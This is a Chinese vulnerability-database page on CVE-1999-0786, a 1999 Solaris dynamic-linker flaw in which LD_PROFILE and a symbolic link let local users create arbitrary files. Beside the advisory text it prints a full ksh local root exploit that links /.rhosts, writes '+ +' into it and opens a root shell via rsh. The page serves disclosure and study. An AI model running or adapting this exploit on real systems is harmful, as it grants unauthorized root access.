Solaris配置文件创建漏洞

Solaris配置文件创建漏洞

漏洞ID 1105548 漏洞类型 未知
发布时间 1999-09-22 更新时间 2005-05-02
图片[1]-Solaris配置文件创建漏洞-安全小百科CVE编号 CVE-1999-0786
图片[2]-Solaris配置文件创建漏洞-安全小百科CNNVD-ID CNNVD-199909-039
漏洞平台 Solaris CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-039
|漏洞详情
Solaris的动态链接器存在漏洞。本地用户可以借助LD_PROFILE环境变量和符号链接攻击创建任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/659/info

A vulnerability in the dynamic linkers while profiling a shared object allows local users to create arbitrary files in the system. It canno't be used to overwrite existing files.

If the LD_PROFILE environment variable is defined it instructs the dynamic linker to profile the shared object defined by it. When profiling is enabled, a profiling buffer file is created and mapped. The name of the buffer file is the name of the shared object being profiled with a .profile extension. By default this buffer is placed under /var/tmp.

The dynamic linker created the buffer file insecurely in the case where it runs in the context of a setuid application. It follows symbolic links while creating the file.

This is Sun BugID 4150646. This is the same bug as Sun BugID 1241843. The new instance was introduced after an extensive rewrite of the dynamic linker. The problem was originally fixed in Solaris 2.5.1 and back patched. It was reintroduced in 2.6 and back patched into 2.5.1. 

#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# [email protected] 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
|参考资料

来源:BID
名称:659
链接:http://www.securityfocus.com/bid/659

相关推荐: McAfee VirusScan WebScanX Code Execution Vulnerability

McAfee VirusScan WebScanX Code Execution Vulnerability 漏洞ID 1101219 漏洞类型 Origin Validation Error 发布时间 2002-12-02 更新时间 2002-12-02 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享